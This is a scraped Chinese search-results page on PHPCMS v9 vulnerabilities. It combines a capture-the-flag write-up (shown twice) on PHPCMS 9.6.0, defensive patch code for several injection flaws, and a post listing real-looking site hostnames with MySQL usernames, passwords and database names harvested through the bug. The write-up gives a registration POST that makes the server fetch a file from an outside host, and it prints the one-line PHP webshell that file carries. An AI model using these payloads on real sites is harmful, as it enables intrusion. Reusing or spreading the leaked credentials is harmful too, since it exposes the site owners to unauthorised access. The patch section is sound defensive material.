精华内容
下载资源
问答
  • CTF/CTF练习平台-phpcmsV9【phpcms 9 6 漏洞利用】
                   

    原题内容:

    一个靶机而已,别搞破坏。

    多谢各位大侠手下留情,flag在根目录里txt文件里
    http://120.24.86.145:8001/


    首先打开题目链接,可以观察到版本信息


    首先想到的是,这很明显是个模板网站,百度走起,get几条有用信息


    获得该模板基本目录信息

    其次百度很明显可以看到phpcms漏洞信息,版本9.6的,这是很明显的信息了,先试试,不行再走普通流程(看到题目的tips说手下留情,就觉得应该是个很简单的办法,不是各种暴力手段)


    这里参考了两个博客:

    PHPcms9.6.0 最新版任意文件上传漏洞

    Phpcms_V9任意文件上传漏洞的利用以及小小的分析


    怎么说呢,这两个博客大概说懂了漏洞如何利用,但是实际操作中还是有很多问题的

    下面列出自己的几个操作失误点,供大家参考:

    1.第一次上传文件,我用了自己腾讯云的服务器里中的文件,一直是报错无content字段(分析一下应该是不具有腾讯云读权限,上传插入失败),改成千牛的连接就可以了

    2.hackbar还是很好用的,值得推荐


    接下来就上图上代码表示怎么做吧



    代码:

    http://120.24.86.145:8001/index.php?m=member&c=index&a=register&siteid=1

    siteid=1&modelid=11&username=qwer12345&password=123456&email=wwq7123456@qq.com&info[content]=<img src=http://ovgb1c2jq.bkt.clouddn.com/1.txt#.jpg>&dosubmit=1&protocol=

    至于下面post的参数怎么来的,不用多说了,用户注册界面bp来的(漏洞原理见上方参考资料)

    src的上传资料来源我的网盘,文件1.txt中含有一句话木马

    <?php @eval($_POST['GETF']);?>

    注意,第一次是测试txt是否可以传入,从报错中明显可以看到该txt文件已经传入

    第二次在上传同时用?将txt文件修改成php格式文件传入

    注意,用户名,邮箱都要改变


    报错信息中就是木马上传到的地址


    木马上传成功,剩下就是用菜刀连接了,注入参数是GETF


    顺利get flag

    吐槽一下(做题的注意素质,看了答案别删了,害得我找了半天,最后我还是去别人wp找的答案)


    flag{admin_a23-ae2132_key}

    如果删了自取答案


    注:发现一个大佬写的脚本,有兴趣的可以去看看

    phpcms9-6-0 一键getshell工具



               

    再分享一下我老师大神的人工智能教程吧。零基础!通俗易懂!风趣幽默!还带黄段子!希望你也加入到我们人工智能的队伍中来!https://blog.csdn.net/jiangjunshow

    展开全文
  • phpcmsV9官方源码漏洞

    2018-09-27 20:22:44
    (1)、phpcms的/phpcms/libs/classes/attachment.class.php中,对输入参数$ext未进行类型限制,导致逻辑漏洞的产生。 解决方法:修改/phpcms/libs/classes/attachment.class.php文件143行左右的download方法,在...
    (1)、phpcms的/phpcms/libs/classes/attachment.class.php中,对输入参数$ext未进行类型限制,导致逻辑漏洞的产生。
    

    解决方法:修改/phpcms/libs/classes/attachment.class.php文件143行左右的download方法,在方法开始位置加入:

    function download($field, $value,$watermark = '0',$ext = 'gif|jpg|jpeg|bmp|png', $absurl = '', $basehref = '')
    	{	
          	$extarr = explode('|',strtolower($ext));
            $allow_extarr = array('gif','jpg','jpeg','bmp','png');
            foreach ($extarr as $theext) {
              if(!in_array(strtolower($theext),$allow_extarr)){
                exit('the file ext is not allowed');
                exit(0);
              }
            }
    		global $image_d;
    
            ......

    (2)、PHPCMS V9 phpcms/modules/poster/poster.php phpcms注入漏洞
    文件路径:/phpcms/modules/poster/poster.php
    漏洞描述:
    phpcms的/phpcms/modules/poster/poster.php 文件中,未对输入参数$_GET['group']进行严格过滤。导致注入漏洞。【注意:该补丁为云盾自研代码修复方案,云盾会根据您当前代码是否符合云盾自研的修复模式进行检测,如果您自行采取了底层/框架统一修复、或者使用了其他的修复方案,可能会导致您虽然已经修复了改漏洞,云盾依然报告存在漏洞,遇到该情况可选择忽略该漏洞提示】

    当前修复代码的演示版本为 Phpcms V9.6.0 Release 20151225,修复区域,所在位置约221行(请自行核对不同版本行差)

    原始代码

    if ($_GET['group']) {
        $group = " `".$_GET['group']."`";
        $fields = "*, COUNT(".$_GET['group'].") AS num";
        $order = " `num` DESC";
    }

    补丁代码
     

    if ($_GET['group']) { $_GET['group'] = preg_replace('#`#', '', $_GET['group']);
        $group = " `".$_GET['group']."`";
        $fields = "*, COUNT(".$_GET['group'].") AS num";
        $order = " `num` DESC";
    }

    (3)、PHPCMS V9 /phpcms/modules/pay/respond.php phpcmsv9宽字节注入修复补丁

    漏洞名称phpcmsv9宽字节注入

    文件路径:/phpcms/modules/pay/respond.php

    修复方法来源于阿里云(安骑士)

    源代码
    /**
    * return_url get形式响应
    */
    public function respond_get() {
    if ($_GET['code']){
    $payment = $this->get_by_code($_GET['code']);
    if(!$payment) showmessage(L('payment_failed'));
    $cfg = unserialize_config($payment['config']);

    补丁代码
    /**
    * return_url get形式响应
    */
    public function respond_get() {
    if ($_GET['code']){
    $payment = $this->get_by_code(mysql_real_escape_string($_GET['code']));  //补丁替换代码
    if(!$payment) showmessage(L('payment_failed'));
    $cfg = unserialize_config($payment['config']);

    (4)、漏洞名称:phpcms注入漏洞
    补丁编号:5454247
    补丁文件:/api/phpsso.php
    补丁来源:云盾自研
    漏洞描述:phpcms注入漏洞。
    打开文件 /api/phpsso.php 找到125行if ($action == 'synlogin')

    原代码:

    /**
    *同步登陆
    */
    if ($action == 'synlogin') { 
    if(!isset($arr['uid'])) exit('0'); 
    $arr['uid'] = intval($arr['uid']); 
    $phpssouid = $arr['uid']; 
    $userinfo = $db->get_one(array('phpssouid'=>$phpssouid)); 

    补丁代码: 

    /**
    *同步登陆
    */
    if ($action == 'synlogin') { 
    if(!isset($arr['uid'])) exit('0'); 
    $phpssouid = intval($arr['uid']);  /** 补丁[合二为一] */ 
    $userinfo = $db->get_one(array('phpssouid'=>$phpssouid)); 

     

    展开全文
  • 原题内容: 一个靶机而已,别搞破坏。 多谢各位大侠手下留情,flag在根目录里txt文件里 ... ...其次百度很明显可以看到phpcms漏洞信息,版本9.6的,这是很明显的信息了,先试试,不行再走普通流...

    原题内容:

    一个靶机而已,别搞破坏。

    多谢各位大侠手下留情,flag在根目录里txt文件里
    http://120.24.86.145:8001/

     

    首先打开题目链接,可以观察到版本信息

    首先想到的是,这很明显是个模板网站,百度走起,get几条有用信息

    获得该模板基本目录信息

    其次百度很明显可以看到phpcms漏洞信息,版本9.6的,这是很明显的信息了,先试试,不行再走普通流程(看到题目的tips说手下留情,就觉得应该是个很简单的办法,不是各种暴力手段)

     

    这里参考了两个博客:

    PHPcms9.6.0 最新版任意文件上传漏洞

    Phpcms_V9任意文件上传漏洞的利用以及小小的分析

     

    怎么说呢,这两个博客大概说懂了漏洞如何利用,但是实际操作中还是有很多问题的

    下面列出自己的几个操作失误点,供大家参考:

    1.第一次上传文件,我用了自己腾讯云的服务器里中的文件,一直是报错无content字段(分析一下应该是不具有腾讯云读权限,上传插入失败),改成千牛的连接就可以了

    2.hackbar还是很好用的,值得推荐

     

    接下来就上图上代码表示怎么做吧

     

    代码:

     

    http://120.24.86.145:8001/index.php?m=member&c=index&a=register&siteid=1

     

    siteid=1&modelid=11&username=qwer12345&password=123456&email=wwq7123456@qq.com&info[content]=<img src=http://ovgb1c2jq.bkt.clouddn.com/1.txt#.jpg>&dosubmit=1&protocol=


    至于下面post的参数怎么来的,不用多说了,用户注册界面bp来的(漏洞原理见上方参考资料)

     

    src的上传资料来源我的网盘,文件1.txt中含有一句话木马

     

    <?php @eval($_POST['GETF']);?>


    注意,第一次是测试txt是否可以传入,从报错中明显可以看到该txt文件已经传入

     

    第二次在上传同时用?将txt文件修改成php格式文件传入

    注意,用户名,邮箱都要改变

    报错信息中就是木马上传到的地址

     

    木马上传成功,剩下就是用菜刀连接了,注入参数是GETF

     

    顺利get flag

    吐槽一下(做题的注意素质,看了答案别删了,害得我找了半天,最后我还是去别人wp找的答案)

     

    flag{admin_a23-ae2132_key}

    如果删了自取答案

     

    注:发现一个大佬写的脚本,有兴趣的可以去看看

    phpcms9-6-0 一键getshell工具

     

     

    展开全文
  • 发一批 phpcmsV9 系统漏洞mysql

    千次阅读 2012-08-02 21:56:36
    简介:一批 phpcmsV9 系统漏洞 批量扫描到的mysql 后面为yes大多数是可以外连的,偶尔几个不可以。需要工具的联系我。 至于怎么连接以及拿shell 请看:http://madman.in/madman5/871.htm www.tj180.com—-root—-Hlj...
    编辑:madman 日期:2012-08-02 分类:最新漏洞 评论:6条评论
    简介:一批 phpcmsV9 系统漏洞  批量扫描到的mysql  后面为yes大多数是可以外连的,偶尔几个不可以。需要工具的联系我。 至于怎么连接以及拿shell 请看:http://madman.in/madman5/871.htm www.tj180.com—-root—-Hlj.com@)!!db—-hulujunmsg—-yes www.u56.cn—-root—-123—-shijiyasi...

    一批 phpcmsV9 系统漏洞  批量扫描到的mysql  后面为yes大多数是可以外连的,偶尔几个不可以。需要工具的联系我。

    至于怎么连接以及拿shell 请看:http://madman.in/madman5/871.htm

    www.tj180.com—-root—-Hlj.com@)!!db—-hulujunmsg—-yes
    www.u56.cn—-root—-123—-shijiyasi—-yes
    www.xlglsybl.com—-admin—-admin—-phpcms—-yes
    www.ylu.edu.cn—-root—-root3306—-ylsy—-no
    www.youdai.cn—-root—-wg2941690—-youdai—-no
    www.fang99.cn—-luzhiyuan*()—-*()luzhiyuan—-fang9—-yes
    www.ocuc.cn—-root—-8d6x4x3w6c—-phpcms—-yes
    www.tlxqsy.com—-root—-sjmd—-website_tlxqsy—-no
    www.bjcankao.com—-bjckcom—-DKwDC23j3ryTXfvB—-bjckcom—-no
    gold.forex.com.cn—-root—-forex1034—-newforexgold—-yes
    www.prcfood.com—-sc_admin_^!*—-sc_admin123—-prcfood—-yes
    www.xbfqw.com—-a0423101914—-9800568—-a0423101914—-yes
    www.jujia23.com—-sq_jujia23—-chenhui86922—-sq_jujia23—-no
    ml.china.com.cn—-root—-kiwhO3Ae—-rw3—-yes
    www.gzcctctx.com—-gzcctctx—-04b001a205—-gzcctctx—-yes
    www.yueyv.com—-me009b1—-z123456—-me009b1—-yes
    www.mamutong999.com—-root—-10086—-mamutong999—-yes
    www.hzqc.cc—-root—-admin198—-hzqc—-no
    www.aspxcs.net—-root—-ytsdbbs—-aspxcsdb0901—-no
    www.tiantongyuan.com.cn—-china—-ZiYan#GuoLing008—-phpcmsv9—-no
    www.raindean.com—-root—-root—-rundi—-yes
    www.23jo.com—-root—-123456—-games_db—-yes
    renpin120.com—-root—-zkeys—-rp120—-yes
    www.iseeuk.com—-root—-00ller5**—-phpcmsv9—-yes
    www.bblfloor.cn—-root—-root—-phpcmsv9—-yes
    www.hbyxx.gov.cn—-root—-monitorli—-hbyxx—-yes
    www.sdds.zjb.gov.cn—-zjb—-zjb@))*—-szj—-no
    cs.bieshu.com—-bieshu—-bieshuftp1861—-bieshu—-no
    www.jinde.org—-root—-xindefaith1999*—-jin—-no
    www.bxkxw.com—-chexiansheng—-chexiansheng123—-chexiansheng—-no
    www.ocuc.cn—-root—-8d6x4x3w6c—-phpcms—-yes
    gatv.com.cn—-txljx—-781026—-about—-yes
    www.phpstudio.info—-root—-gaox2004—-phpcmsv9_test—-no
    www.qinzi99.com—-root—-qinziftpok—-qinzi—-yes
    nxs.offcn.com—-root—-offcn0911—-offcn2012_nxs—-yes
    www.gjjx.com.cn—-newgjjx—-mysql#23gjjx—-web_newgjjx—-yes
    www.youxuela.com—-root—-La20120626—-www_youxuela_com—-yes
    www.hubert77.com—-zhumh77—-zhumhqiqi77—-zhumh77—-yes
    zjks.offcn.com—-root—-offcn0911—-offcn2012_zjks—-yes
    szyf.offcn.com—-root—-offcn0911—-offcn2012_szyf—-yes
    cgks.offcn.com—-root—-offcn0911—-offcn2012_cgks—-yes
    zfgj.offcn.com—-root—-offcn0911—-offcn2012_zfgj—-yes

    展开全文
  • POC: #!/usr/bin/env python #coding=utf-8 import urllib2 def check(url): mark = True req = urllib2.Request(url) ... req.add_header('User-agent', 'Mozilla/4.0 (compatible;... W...
  • phpcmsv9 authkey泄露导致SQL注入漏洞 http://www.2cto.com/phpsso_server/index.php?m=phpsso&c=index&a=getapplist&auth_data=v=1&appid=1&data=662dCAZSAwgFUlUJBAxbVQJX...
  • phpcmsV9某sql注射漏洞及修复2014-05-24 0个评论 收藏我要投稿 别人说最危险的地方最安全,我说最安全的地方最危险。。。相信你们也没有想到这个最常见,常常会在各种教程出现的地方会存在SQL注射。。。需 GPC OFF...
  • PHPcmsV9任意文件读取漏洞拿Shell

    千次阅读 2012-08-02 21:57:53
    简介:作者:Return 前几天爆的phpcmsV9任意文件读取漏洞,其实危害是很大的,但往往还是一些管理员 觉得漏洞并不可怕,听到某人说道,即使是被人读取了数据库数据也没用,为啥,因为 他权限数据库权限单库单用户,...
  • PHPCMS V9.6.3后台的漏洞分析 ...漏洞文件:\phpcmsv9\phpcms\modules\block\block_admin.php 漏洞产生点位于265~272行:   1 if (@file_put_contents($filepath,$str)) { 2 ob_start()...
  • 好久没有关注phpcms了,最近老是有朋友问我关于phpcms的问题,网上找了一下,目前问题比较严重的就是这个authkey泄露导致sql注入拿shell的了,先转些介绍文章吧,exp稍候写出来了再发,请及时关注本人博客。...
  • 一,下载安装phpcmsv966.01,下载官方下载phpcms v9.6.0版本,下载地址:http://download.phpcms.cn/v9/9.6/下载之后,将源码都解压到phpstudy的www目录,浏览器访问源码中的install目录,一步步安装2,打开后台管理,...
  • phpcms v9.6.3的基础上进行修复维护【模板素技术支持】 更新修补内容 修复阅读收费失效的问题 修复高版本MySQL环境下的安装问题 修复发布内容时绕过审核的漏洞 修复文件包含漏洞 修正动态或伪静态下分页不存在时未...
  • 一批 phpcmsV9 系統漏洞 批量掃描到的mysql 后面為yes大多數是可以外連的,偶爾幾個不可以。需要工具的聯系我。www.tj180.com—-root—-Hlj.com@)!!db—-hulujunmsg—-yeswww.u56.cn—-root—-123—-shijiyasi—-...
  • phpcmsV9SQL注射+列目录

    2012-01-28 09:50:49
    漏洞作者: kobin97 提交时间: 2012-01-20 ...漏洞文件:phpcms\modules\p_w_upload\p_w_uploads.php SQL注射漏洞相关代码: public function album_load() { if(!$this->admin_username) return fa...
  • 摘要其实我在发第一个漏洞的时候,就看到了WooYun: PhpcmsV9 SQL注射 2013年贺岁第一发提到的通行证的代码:parse_str(sys_auth($_POST['data'], 'DECODE', $this->applist[$this->appid]['authkey']), $this-...
  • 关于阿里云提示“phpcmsv9宽字节注入问题”的漏洞修复方案简介:漏洞名称:phpcmsv9宽字节注入问题漏洞描述:phpcmsv9.5.9以后版本开始默认使用mysqli支持,在phpcms/modules/pay/respond.php中,因为代码逻辑不够...
  • 0x01 测试场景:版本信息截图如下:0x02 测试思路:检测者通过投稿的方式或者其他可能的方式...0x03 文件报错这种类型的洞在phpcms中还挺常见的,主要是没有处理好一些包含,单独挖这种洞实际上意义也不大,但是如...
  • 9.管理内容列表页,用户信息链接提示 hash错误。 10.更新图片路径判断排除非phpcms数据表。 11.自主升级不增加积分问题。 12.搜索末页内容为空的bug。 13.碎片、专题内容图片上传报参数错误的问题。 14.内容列表...
  • 9.管理内容列表页,用户信息链接提示 hash错误。 10.更新图片路径判断排除非phpcms数据表。 11.自主升级不增加积分问题。 12.搜索末页内容为空的bug。 13.碎片、专题内容图片上传报参数错误的问题。 14.内容列表...
  • 版本V9.3.4 功能变更及bug修正说明: 1. 修复漏洞:支付模块过滤不严格导致SQL注入 2. 修正后台登陆过期时间问题 3. 修复遍历上级目录漏洞 4. 防止注入漏洞。 5. 修复:后台管理员密码泄露后,可能存在的SQL注入 6. ...
  • phpcmsV9 文件权限设置 以下文件或者目录必须可写 例如访问地址 localhost/phpcms index.html chmod 777 index.html caches/ chmod -R 777 caches html/ chmod -R 777 html uploadfile/ chmod -...
  • phpcms v9 dev是官方公布的最新开发版...修复搜索漏洞6.修复积分兑换无法显示报错问题7.修复信息审核的BUG8.修复会员积分发生变化,会员组未改变的BUG9.修复评论管理的功能10.修复短信UTF8编码问题11.修复审核预览时,
  • bugku phpcms

    2020-06-05 07:58:28
    bugku phpcms 用phpcmsv9的任意文件上传漏洞拿getshell,但是我没找到可以上传的地方 无奈之下御剑扫描一下吧 发现了robots.txt 尝试进一下 嗯… 然后就有flag:flag{admin_a23-ae2132_key}
  • 5.修复搜索漏洞 6.修复积分兑换无法显示报错问题 7.修复信息审核的BUG 8.修复会员积分发生变化,会员组未改变的BUG 9.修复评论管理的功能 10.修复短信UTF8编码问题 11.修复审核预览时,dialog窗口IE下左上的...

空空如也

空空如也

1 2 3
收藏数 46
精华内容 18
关键字:

phpcmsv9漏洞